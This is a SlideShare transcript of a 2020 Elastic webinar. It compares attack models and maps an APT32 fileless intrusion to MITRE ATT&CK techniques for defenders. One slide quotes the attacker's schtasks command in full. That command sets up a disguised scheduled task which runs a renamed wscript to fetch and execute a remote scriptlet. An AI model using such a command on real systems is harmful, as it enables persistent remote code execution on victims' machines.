SlideShare a Scribd company logo

Upgrade your attack model: finding and stopping fileless attacks with MITRE ATT&CK

F
FaithWestdorp

Upgrade your attack model: finding and stopping fileless attacks with MITRE ATT&CK

Technology
1 of 33
Download to read offline
Presenter: Patrick Tierney Date: June 24, 2020 Upgrade Your Attack Model: Finding and Stopping Fileless Attacks with MITRE ATT&CK
About Me Patrick Tierney Principal Solutions Architect patrick.tierney@elastic.co ▪ 20 years in the security industry in IT operations and sales ▪ Internet Security Systems/IBM 1998 and Endgame/Elastic (2010 ▪ Nerd credentials: I have 1500 comic books next to my desk right now
What Is An Attack Model and What Does It Do?
Attack Models capture information used to think like an attacker: threat modeling, abuse case development and refinement, data classification, and technology-specific attack patterns. Building Security In Maturity Model https://www.bsimm.com/about.html
A Brief History of Attack Models Sorry, Stephen
Diamond Security Model ● Looks simplistic, but can still be used to define complex attacks ● Includes the motivational factor of the attacker. ● Fully defined in a whitepaper here: https://www.activeresponse.org/wp-c ontent/uploads/2013/07/diamond.pdf
Diamond Security Model ● Mapping the Attack on the Deathstar
Cyber Attack Lifecycle ● Developed by Mandiant ● Defines the cycle involved in dwell time ● Defines a completed mission, but I don’t think an attacker thinks that way
APT 39 Mapped to Cyber Attack Lifecycle
Cyber Kill Chain™ ● Developed by Lockheed ● Defines 7 steps of an attack ● Probably the most common attack definition
NIST Security Framework ● 5 columns (or Simon buttons, in the newer version) ● Created in response to Obama executive order ● Really more of a risk guideline framework than a model ● Only model to identify a recovery step
So, what’s the problem with those?
MITRE ATT&CK A More Complete Model for Today’s Threats ● Adversarial Tactics, Techniques & Common Knowledge ● Federally funded, non-profit organization ● Open source framework ● Over 300 attacker techniques identified ● Multiple OS coverage ● Malware is only part of the story ● Tests enterprise solutions ● Evaluate the raw test data for yourself: https://www.elastic.co/blog/visualizing-mitre-round-2-evaluation-results-Kibana
If You Don’t Know What You’re Looking For, How Will You Ever Find It?
Demo Time! Using the Matrix for fun and profit education
APT32 In-Memory ATTACK Lets Walk Through an Example
T1193  Spearphishing Attachment Phishing message with malicious document delivered through email T1036  Masquerading Masquerading as a legitimate Windows process T1053  Scheduled Task Persistence via scheduled task T1064  Scripting Malicious script execution from scheduled task T1055  Process Injection Process injection to gain code execution T1094  Custom Command and Control Command and control using Cobalt Strike ATT&CK MAPPING Techniques used in APT32 attack
Technique ID T1193  Spearphishing Attachment Phishing message with malicious document delivered through email.
Technique ID T1193  Spearphishing Attachment The attacker is counting on the end user to enable content for the document. And they often do.
Technique ID T1036  Masquerading The first stage of the attack is to drop some files in c:ProgramData. But ying.exe is actually wscript.exe.
Technique ID T1053  Scheduled Task The malicious document launches a scheduled task for persistence. schtasks /create /sc MINUTE /tn "GoogleUpdateTasksMachineCore" /tr ""C:ProgramDataYING.exe" //E:vbscript /b C:ProgramDataYANG.txt localhost "sc"r"i"p"t:https://steam.learning-api.com/ib.jpg" /mo 11 /F
Technique ID T1064  Scripting From A Scheduled Task. The ying.exe loads an in-memory .NET binaries loader.dll and scrobj.dll
Technique ID T1055  Process Injection The ying.exe process injects code into its own process (which is really wscript) to insert instructions for contacting the command and control server.
Technique ID T1094  Custom Command and Control And now that it has its instructions, YING.exe reaches out to it’s control server, in this case to download a Cobalt Strike payload.
T1193  Spearphishing Attachment Phishing message with malicious document delivered through email T1036  Masquerading Masquerading as a legitimate Windows process T1053  Scheduled Task Persistence via scheduled task T1064  Scripting Malicious script execution from scheduled task T1055  Process Injection Process injection to gain code execution T1094  Custom Command and Control Command and control using Cobalt Strike ATT&CK MAPPING Techniques used in APT32 attack
How do I know if I’m protected?
Now Elastic!
Website: https://atomicredteam.io/ Twitter: @redcanaryco GitHub: https://github.com/redcanaryco/atomic-red-team Free and open-sourced Powershell scripts to test your defenses against dozens of MITRE techniques.
Website: https://attackiq.com/ Twitter: @attackiq Commercial software to automate MITRE based red team exercises
Security how it should be: open Elastic Security integrates endpoint security and SIEM to give you prevention, collection, detection, and response capabilities for unified protection across your infrastructure. ELASTIC SECURITY
www.elastic.co Search - Observe - Protect Thank You
Endpoint SIEM Elastic Security

Recommended

Sophos Day Belux 2014
Sophos Day Belux 2014Sophos Day Belux 2014
Sophos Day Belux 2014Malik Mesellem
 
12 Crucial Windows Security Skills for 2017
12 Crucial Windows Security Skills for 201712 Crucial Windows Security Skills for 2017
12 Crucial Windows Security Skills for 2017Paula Januszkiewicz
 
30 Cybersecurity Skills You Need To Become a Windows Security Pro
30 Cybersecurity Skills You Need To Become a Windows Security Pro 30 Cybersecurity Skills You Need To Become a Windows Security Pro
30 Cybersecurity Skills You Need To Become a Windows Security Pro Paula Januszkiewicz
 
[OWASP Poland Day] Application security - daily questions & answers
[OWASP Poland Day] Application security - daily questions & answers[OWASP Poland Day] Application security - daily questions & answers
[OWASP Poland Day] Application security - daily questions & answersOWASP
 
Understanding CryptoLocker (Ransomware) with a Case Study
Understanding CryptoLocker (Ransomware) with a Case StudyUnderstanding CryptoLocker (Ransomware) with a Case Study
Understanding CryptoLocker (Ransomware) with a Case Studysecurityxploded
 
Web security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-kearyWeb security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-kearydrewz lin
 
BlueHat v17 || You Are Making Application Whitelisting Difficult
BlueHat v17 || You Are Making Application Whitelisting Difficult BlueHat v17 || You Are Making Application Whitelisting Difficult
BlueHat v17 || You Are Making Application Whitelisting Difficult BlueHat Security Conference
 
Neoito — Secure coding practices
Neoito — Secure coding practicesNeoito — Secure coding practices
Neoito — Secure coding practicesNeoito
 

Recommended

Sophos Day Belux 2014
Sophos Day Belux 2014Sophos Day Belux 2014
Sophos Day Belux 2014Malik Mesellem
 
12 Crucial Windows Security Skills for 2017
12 Crucial Windows Security Skills for 201712 Crucial Windows Security Skills for 2017
12 Crucial Windows Security Skills for 2017Paula Januszkiewicz
 
30 Cybersecurity Skills You Need To Become a Windows Security Pro
30 Cybersecurity Skills You Need To Become a Windows Security Pro 30 Cybersecurity Skills You Need To Become a Windows Security Pro
30 Cybersecurity Skills You Need To Become a Windows Security Pro Paula Januszkiewicz
 
[OWASP Poland Day] Application security - daily questions & answers
[OWASP Poland Day] Application security - daily questions & answers[OWASP Poland Day] Application security - daily questions & answers
[OWASP Poland Day] Application security - daily questions & answersOWASP
 
Understanding CryptoLocker (Ransomware) with a Case Study
Understanding CryptoLocker (Ransomware) with a Case StudyUnderstanding CryptoLocker (Ransomware) with a Case Study
Understanding CryptoLocker (Ransomware) with a Case Studysecurityxploded
 
Web security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-kearyWeb security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-kearydrewz lin
 
BlueHat v17 || You Are Making Application Whitelisting Difficult
BlueHat v17 || You Are Making Application Whitelisting Difficult BlueHat v17 || You Are Making Application Whitelisting Difficult
BlueHat v17 || You Are Making Application Whitelisting Difficult BlueHat Security Conference
 
Neoito — Secure coding practices
Neoito — Secure coding practicesNeoito — Secure coding practices
Neoito — Secure coding practicesNeoito
 
Automated Penetration Testing With Core Impact
Automated Penetration Testing With Core ImpactAutomated Penetration Testing With Core Impact
Automated Penetration Testing With Core ImpactTom Eston
 
Client-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationClient-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationChris Gates
 
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...Quek Lilian
 
Cyber security webinar part 1 - Threat Landscape
Cyber security webinar part 1 - Threat LandscapeCyber security webinar part 1 - Threat Landscape
Cyber security webinar part 1 - Threat LandscapeF-Secure Corporation
 
The art of android hacking
The art of android hackingThe art of android hacking
The art of android hackingAbhinav Mishra
 
Top 10 mobile security risks - Khổng Văn Cường
Top 10 mobile security risks - Khổng Văn CườngTop 10 mobile security risks - Khổng Văn Cường
Top 10 mobile security risks - Khổng Văn CườngVõ Thái Lâm
 
Csrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equalCsrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equaldrewz lin
 
Basics of Server Side Template Injection
Basics of Server Side Template InjectionBasics of Server Side Template Injection
Basics of Server Side Template InjectionVandana Verma
 
Defending Workstations - Cyber security webinar part 2
Defending Workstations - Cyber security webinar part 2Defending Workstations - Cyber security webinar part 2
Defending Workstations - Cyber security webinar part 2F-Secure Corporation
 
AktaionPPTv5_JZedits
AktaionPPTv5_JZeditsAktaionPPTv5_JZedits
AktaionPPTv5_JZeditsRod Soto
 
IT Security for Nonprofits
IT Security for NonprofitsIT Security for Nonprofits
IT Security for NonprofitsCommunity IT Innovators
 
Azure Sentinel
Azure SentinelAzure Sentinel
Azure SentinelKumton Suttiraksiri
 
Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...
Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...
Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...Jennifer Burns
 
Login cat tekmonks - v4
Login cat tekmonks - v4Login cat tekmonks - v4
Login cat tekmonks - v4TEKMONKS
 
Login cat tekmonks - v4
Login cat tekmonks - v4Login cat tekmonks - v4
Login cat tekmonks - v4Rohit Kapoor
 
CCI2018 - La "moderna" Sicurezza informatica & Microsoft
CCI2018 - La "moderna" Sicurezza informatica & MicrosoftCCI2018 - La "moderna" Sicurezza informatica & Microsoft
CCI2018 - La "moderna" Sicurezza informatica & Microsoftwalk2talk srl
 
Modern cybersecurity threats, and shiny new tools to help deal with them - T...
Modern cybersecurity threats, and shiny new tools to help deal with them - T... Modern cybersecurity threats, and shiny new tools to help deal with them - T...
Modern cybersecurity threats, and shiny new tools to help deal with them - T...ITCamp
 
Modern cybersecurity threats, and shiny new tools to help deal with them
Modern cybersecurity threats, and shiny new tools to help deal with themModern cybersecurity threats, and shiny new tools to help deal with them
Modern cybersecurity threats, and shiny new tools to help deal with themTudor Damian
 
Security Awareness Training by Fortinet
Security Awareness Training by FortinetSecurity Awareness Training by Fortinet
Security Awareness Training by FortinetAtlantic Training, LLC.
 
Attack eu 2021 attack4cvc
Attack eu 2021 attack4cvcAttack eu 2021 attack4cvc
Attack eu 2021 attack4cvcAndrey Bezverkhiy
 
[OPD 2019] Threat modeling at scale
[OPD 2019] Threat modeling at scale[OPD 2019] Threat modeling at scale
[OPD 2019] Threat modeling at scaleOWASP
 
Ht r32
Ht r32Ht r32
Ht r32SelectedPresentations
 

More Related Content

What's hot

Automated Penetration Testing With Core Impact
Automated Penetration Testing With Core ImpactAutomated Penetration Testing With Core Impact
Automated Penetration Testing With Core ImpactTom Eston
 
Client-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationClient-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationChris Gates
 
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...Quek Lilian
 
Cyber security webinar part 1 - Threat Landscape
Cyber security webinar part 1 - Threat LandscapeCyber security webinar part 1 - Threat Landscape
Cyber security webinar part 1 - Threat LandscapeF-Secure Corporation
 
The art of android hacking
The art of android hackingThe art of android hacking
The art of android hackingAbhinav Mishra
 
Top 10 mobile security risks - Khổng Văn Cường
Top 10 mobile security risks - Khổng Văn CườngTop 10 mobile security risks - Khổng Văn Cường
Top 10 mobile security risks - Khổng Văn CườngVõ Thái Lâm
 
Csrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equalCsrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equaldrewz lin
 
Basics of Server Side Template Injection
Basics of Server Side Template InjectionBasics of Server Side Template Injection
Basics of Server Side Template InjectionVandana Verma
 
Defending Workstations - Cyber security webinar part 2
Defending Workstations - Cyber security webinar part 2Defending Workstations - Cyber security webinar part 2
Defending Workstations - Cyber security webinar part 2F-Secure Corporation
 

What's hot (9)

Automated Penetration Testing With Core Impact
Automated Penetration Testing With Core ImpactAutomated Penetration Testing With Core Impact
Automated Penetration Testing With Core Impact
 
Client-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationClient-Side Penetration Testing Presentation
Client-Side Penetration Testing Presentation
 
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
 
Cyber security webinar part 1 - Threat Landscape
Cyber security webinar part 1 - Threat LandscapeCyber security webinar part 1 - Threat Landscape
Cyber security webinar part 1 - Threat Landscape
 
The art of android hacking
The art of android hackingThe art of android hacking
The art of android hacking
 
Top 10 mobile security risks - Khổng Văn Cường
Top 10 mobile security risks - Khổng Văn CườngTop 10 mobile security risks - Khổng Văn Cường
Top 10 mobile security risks - Khổng Văn Cường
 
Csrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equalCsrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equal
 
Basics of Server Side Template Injection
Basics of Server Side Template InjectionBasics of Server Side Template Injection
Basics of Server Side Template Injection
 
Defending Workstations - Cyber security webinar part 2
Defending Workstations - Cyber security webinar part 2Defending Workstations - Cyber security webinar part 2
Defending Workstations - Cyber security webinar part 2
 

Similar to Upgrade your attack model: finding and stopping fileless attacks with MITRE ATT&CK

AktaionPPTv5_JZedits
AktaionPPTv5_JZeditsAktaionPPTv5_JZedits
AktaionPPTv5_JZeditsRod Soto
 
Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...
Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...
Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...Jennifer Burns
 
Login cat tekmonks - v4
Login cat tekmonks - v4Login cat tekmonks - v4
Login cat tekmonks - v4TEKMONKS
 
Login cat tekmonks - v4
Login cat tekmonks - v4Login cat tekmonks - v4
Login cat tekmonks - v4Rohit Kapoor
 
CCI2018 - La "moderna" Sicurezza informatica & Microsoft
CCI2018 - La "moderna" Sicurezza informatica & MicrosoftCCI2018 - La "moderna" Sicurezza informatica & Microsoft
CCI2018 - La "moderna" Sicurezza informatica & Microsoftwalk2talk srl
 
Modern cybersecurity threats, and shiny new tools to help deal with them - T...
Modern cybersecurity threats, and shiny new tools to help deal with them - T... Modern cybersecurity threats, and shiny new tools to help deal with them - T...
Modern cybersecurity threats, and shiny new tools to help deal with them - T...ITCamp
 
Modern cybersecurity threats, and shiny new tools to help deal with them
Modern cybersecurity threats, and shiny new tools to help deal with themModern cybersecurity threats, and shiny new tools to help deal with them
Modern cybersecurity threats, and shiny new tools to help deal with themTudor Damian
 
[OPD 2019] Threat modeling at scale
[OPD 2019] Threat modeling at scale[OPD 2019] Threat modeling at scale
[OPD 2019] Threat modeling at scaleOWASP
 
Toorcon - Purple Haze: The Spear Phishing Experience
Toorcon - Purple Haze: The Spear Phishing ExperienceToorcon - Purple Haze: The Spear Phishing Experience
Toorcon - Purple Haze: The Spear Phishing ExperienceJesse Nebling
 
Product security by Blockchain, AI and Security Certs
Product security by Blockchain, AI and Security CertsProduct security by Blockchain, AI and Security Certs
Product security by Blockchain, AI and Security CertsLabSharegroup
 
Prevent Getting Hacked by Using a Network Vulnerability Scanner
Prevent Getting Hacked by Using a Network Vulnerability ScannerPrevent Getting Hacked by Using a Network Vulnerability Scanner
Prevent Getting Hacked by Using a Network Vulnerability ScannerGFI Software
 
Security Myths and Facts in Today's It World (Tudor Damian & Mihai Tataran)
Security Myths and Facts in Today's It World (Tudor Damian & Mihai Tataran)Security Myths and Facts in Today's It World (Tudor Damian & Mihai Tataran)
Security Myths and Facts in Today's It World (Tudor Damian & Mihai Tataran)ITCamp
 
How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsSergey Soldatov
 
Allegory of the cave(1)
Allegory of the cave(1)Allegory of the cave(1)
Allegory of the cave(1)setuid0
 
SplunkLive! Zurich 2018: The Evolution of Splunk at Helvetia Insurance
SplunkLive! Zurich 2018: The Evolution of Splunk at Helvetia InsuranceSplunkLive! Zurich 2018: The Evolution of Splunk at Helvetia Insurance
SplunkLive! Zurich 2018: The Evolution of Splunk at Helvetia InsuranceSplunk
 

Similar to Upgrade your attack model: finding and stopping fileless attacks with MITRE ATT&CK (20)

AktaionPPTv5_JZedits
AktaionPPTv5_JZeditsAktaionPPTv5_JZedits
AktaionPPTv5_JZedits
 
IT Security for Nonprofits
IT Security for NonprofitsIT Security for Nonprofits
IT Security for Nonprofits
 
Azure Sentinel
Azure SentinelAzure Sentinel
Azure Sentinel
 
Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...
Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...
Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...
 
Login cat tekmonks - v4
Login cat tekmonks - v4Login cat tekmonks - v4
Login cat tekmonks - v4
 
Login cat tekmonks - v4
Login cat tekmonks - v4Login cat tekmonks - v4
Login cat tekmonks - v4
 
CCI2018 - La "moderna" Sicurezza informatica & Microsoft
CCI2018 - La "moderna" Sicurezza informatica & MicrosoftCCI2018 - La "moderna" Sicurezza informatica & Microsoft
CCI2018 - La "moderna" Sicurezza informatica & Microsoft
 
Modern cybersecurity threats, and shiny new tools to help deal with them - T...
Modern cybersecurity threats, and shiny new tools to help deal with them - T... Modern cybersecurity threats, and shiny new tools to help deal with them - T...
Modern cybersecurity threats, and shiny new tools to help deal with them - T...
 
Modern cybersecurity threats, and shiny new tools to help deal with them
Modern cybersecurity threats, and shiny new tools to help deal with themModern cybersecurity threats, and shiny new tools to help deal with them
Modern cybersecurity threats, and shiny new tools to help deal with them
 
Security Awareness Training by Fortinet
Security Awareness Training by FortinetSecurity Awareness Training by Fortinet
Security Awareness Training by Fortinet
 
Attack eu 2021 attack4cvc
Attack eu 2021 attack4cvcAttack eu 2021 attack4cvc
Attack eu 2021 attack4cvc
 
[OPD 2019] Threat modeling at scale
[OPD 2019] Threat modeling at scale[OPD 2019] Threat modeling at scale
[OPD 2019] Threat modeling at scale
 
Ht r32
Ht r32Ht r32
Ht r32
 
Toorcon - Purple Haze: The Spear Phishing Experience
Toorcon - Purple Haze: The Spear Phishing ExperienceToorcon - Purple Haze: The Spear Phishing Experience
Toorcon - Purple Haze: The Spear Phishing Experience
 
Product security by Blockchain, AI and Security Certs
Product security by Blockchain, AI and Security CertsProduct security by Blockchain, AI and Security Certs
Product security by Blockchain, AI and Security Certs
 
Prevent Getting Hacked by Using a Network Vulnerability Scanner
Prevent Getting Hacked by Using a Network Vulnerability ScannerPrevent Getting Hacked by Using a Network Vulnerability Scanner
Prevent Getting Hacked by Using a Network Vulnerability Scanner
 
Security Myths and Facts in Today's It World (Tudor Damian & Mihai Tataran)
Security Myths and Facts in Today's It World (Tudor Damian & Mihai Tataran)Security Myths and Facts in Today's It World (Tudor Damian & Mihai Tataran)
Security Myths and Facts in Today's It World (Tudor Damian & Mihai Tataran)
 
How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operations
 
Allegory of the cave(1)
Allegory of the cave(1)Allegory of the cave(1)
Allegory of the cave(1)
 
SplunkLive! Zurich 2018: The Evolution of Splunk at Helvetia Insurance
SplunkLive! Zurich 2018: The Evolution of Splunk at Helvetia InsuranceSplunkLive! Zurich 2018: The Evolution of Splunk at Helvetia Insurance
SplunkLive! Zurich 2018: The Evolution of Splunk at Helvetia Insurance
 

More from FaithWestdorp

Using Elastiknn for exact and approximate nearest neighbor search
Using Elastiknn for exact and approximate nearest neighbor searchUsing Elastiknn for exact and approximate nearest neighbor search
Using Elastiknn for exact and approximate nearest neighbor searchFaithWestdorp
 
Observability from the Home
Observability from the HomeObservability from the Home
Observability from the HomeFaithWestdorp
 
Elasticsearch Goes to Congress
Elasticsearch Goes to CongressElasticsearch Goes to Congress
Elasticsearch Goes to CongressFaithWestdorp
 
Eliminate your zombie technology ray myers - 11-5-2020
Eliminate your zombie technology ray myers - 11-5-2020Eliminate your zombie technology ray myers - 11-5-2020
Eliminate your zombie technology ray myers - 11-5-2020FaithWestdorp
 
Mejorando las busquedas en nuestras aplicaciones web con elasticsearch
Mejorando las busquedas en nuestras aplicaciones web con elasticsearchMejorando las busquedas en nuestras aplicaciones web con elasticsearch
Mejorando las busquedas en nuestras aplicaciones web con elasticsearchFaithWestdorp
 
Evolving with Elastic: GetSet Learning
Evolving with Elastic: GetSet LearningEvolving with Elastic: GetSet Learning
Evolving with Elastic: GetSet LearningFaithWestdorp
 
EmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
EmPOW: Integrating Attack Behavior Intelligence into Logstash PluginsEmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
EmPOW: Integrating Attack Behavior Intelligence into Logstash PluginsFaithWestdorp
 
Examining OpenData with a Search Index using Elasticsearch
Examining OpenData with a Search Index using ElasticsearchExamining OpenData with a Search Index using Elasticsearch
Examining OpenData with a Search Index using ElasticsearchFaithWestdorp
 
From the trenches: scaling a large log management deployment
From the trenches: scaling a large log management deploymentFrom the trenches: scaling a large log management deployment
From the trenches: scaling a large log management deploymentFaithWestdorp
 
Logstash and Maxmind: not just for GEOIP anymore
Logstash and Maxmind: not just for GEOIP anymoreLogstash and Maxmind: not just for GEOIP anymore
Logstash and Maxmind: not just for GEOIP anymoreFaithWestdorp
 
Elasticsearch's aggregations & esctl in action or how i built a cli tool...
Elasticsearch's aggregations & esctl in action or how i built a cli tool...Elasticsearch's aggregations & esctl in action or how i built a cli tool...
Elasticsearch's aggregations & esctl in action or how i built a cli tool...FaithWestdorp
 
Searching for NLP: Using Elasticsearch to Create MVPs of NLP-enabled User Ex...
Searching for NLP: Using Elasticsearch to Create MVPs of NLP-enabled User Ex... Searching for NLP: Using Elasticsearch to Create MVPs of NLP-enabled User Ex...
Searching for NLP: Using Elasticsearch to Create MVPs of NLP-enabled User Ex...FaithWestdorp
 
Introduction to machine learning using Elastic
Introduction to machine learning using ElasticIntroduction to machine learning using Elastic
Introduction to machine learning using ElasticFaithWestdorp
 
Elastic Observability
Elastic Observability Elastic Observability
Elastic Observability FaithWestdorp
 
Threat hunting with Elastic APM
Threat hunting with Elastic APMThreat hunting with Elastic APM
Threat hunting with Elastic APMFaithWestdorp
 
Guide to Data Visualization in Kibana
Guide to Data Visualization in KibanaGuide to Data Visualization in Kibana
Guide to Data Visualization in KibanaFaithWestdorp
 
Elastic's recommendation on keeping services up and running with real-time vi...
Elastic's recommendation on keeping services up and running with real-time vi...Elastic's recommendation on keeping services up and running with real-time vi...
Elastic's recommendation on keeping services up and running with real-time vi...FaithWestdorp
 
Esctl in action elastic user group presentation aug 25 2020
Esctl in action elastic user group presentation aug 25 2020Esctl in action elastic user group presentation aug 25 2020
Esctl in action elastic user group presentation aug 25 2020FaithWestdorp
 

More from FaithWestdorp (18)

Using Elastiknn for exact and approximate nearest neighbor search
Using Elastiknn for exact and approximate nearest neighbor searchUsing Elastiknn for exact and approximate nearest neighbor search
Using Elastiknn for exact and approximate nearest neighbor search
 
Observability from the Home
Observability from the HomeObservability from the Home
Observability from the Home
 
Elasticsearch Goes to Congress
Elasticsearch Goes to CongressElasticsearch Goes to Congress
Elasticsearch Goes to Congress
 
Eliminate your zombie technology ray myers - 11-5-2020
Eliminate your zombie technology ray myers - 11-5-2020Eliminate your zombie technology ray myers - 11-5-2020
Eliminate your zombie technology ray myers - 11-5-2020
 
Mejorando las busquedas en nuestras aplicaciones web con elasticsearch
Mejorando las busquedas en nuestras aplicaciones web con elasticsearchMejorando las busquedas en nuestras aplicaciones web con elasticsearch
Mejorando las busquedas en nuestras aplicaciones web con elasticsearch
 
Evolving with Elastic: GetSet Learning
Evolving with Elastic: GetSet LearningEvolving with Elastic: GetSet Learning
Evolving with Elastic: GetSet Learning
 
EmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
EmPOW: Integrating Attack Behavior Intelligence into Logstash PluginsEmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
EmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
 
Examining OpenData with a Search Index using Elasticsearch
Examining OpenData with a Search Index using ElasticsearchExamining OpenData with a Search Index using Elasticsearch
Examining OpenData with a Search Index using Elasticsearch
 
From the trenches: scaling a large log management deployment
From the trenches: scaling a large log management deploymentFrom the trenches: scaling a large log management deployment
From the trenches: scaling a large log management deployment
 
Logstash and Maxmind: not just for GEOIP anymore
Logstash and Maxmind: not just for GEOIP anymoreLogstash and Maxmind: not just for GEOIP anymore
Logstash and Maxmind: not just for GEOIP anymore
 
Elasticsearch's aggregations & esctl in action or how i built a cli tool...
Elasticsearch's aggregations & esctl in action or how i built a cli tool...Elasticsearch's aggregations & esctl in action or how i built a cli tool...
Elasticsearch's aggregations & esctl in action or how i built a cli tool...
 
Searching for NLP: Using Elasticsearch to Create MVPs of NLP-enabled User Ex...
Searching for NLP: Using Elasticsearch to Create MVPs of NLP-enabled User Ex... Searching for NLP: Using Elasticsearch to Create MVPs of NLP-enabled User Ex...
Searching for NLP: Using Elasticsearch to Create MVPs of NLP-enabled User Ex...
 
Introduction to machine learning using Elastic
Introduction to machine learning using ElasticIntroduction to machine learning using Elastic
Introduction to machine learning using Elastic
 
Elastic Observability
Elastic Observability Elastic Observability
Elastic Observability
 
Threat hunting with Elastic APM
Threat hunting with Elastic APMThreat hunting with Elastic APM
Threat hunting with Elastic APM
 
Guide to Data Visualization in Kibana
Guide to Data Visualization in KibanaGuide to Data Visualization in Kibana
Guide to Data Visualization in Kibana
 
Elastic's recommendation on keeping services up and running with real-time vi...
Elastic's recommendation on keeping services up and running with real-time vi...Elastic's recommendation on keeping services up and running with real-time vi...
Elastic's recommendation on keeping services up and running with real-time vi...
 
Esctl in action elastic user group presentation aug 25 2020
Esctl in action elastic user group presentation aug 25 2020Esctl in action elastic user group presentation aug 25 2020
Esctl in action elastic user group presentation aug 25 2020
 

Recently uploaded

TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
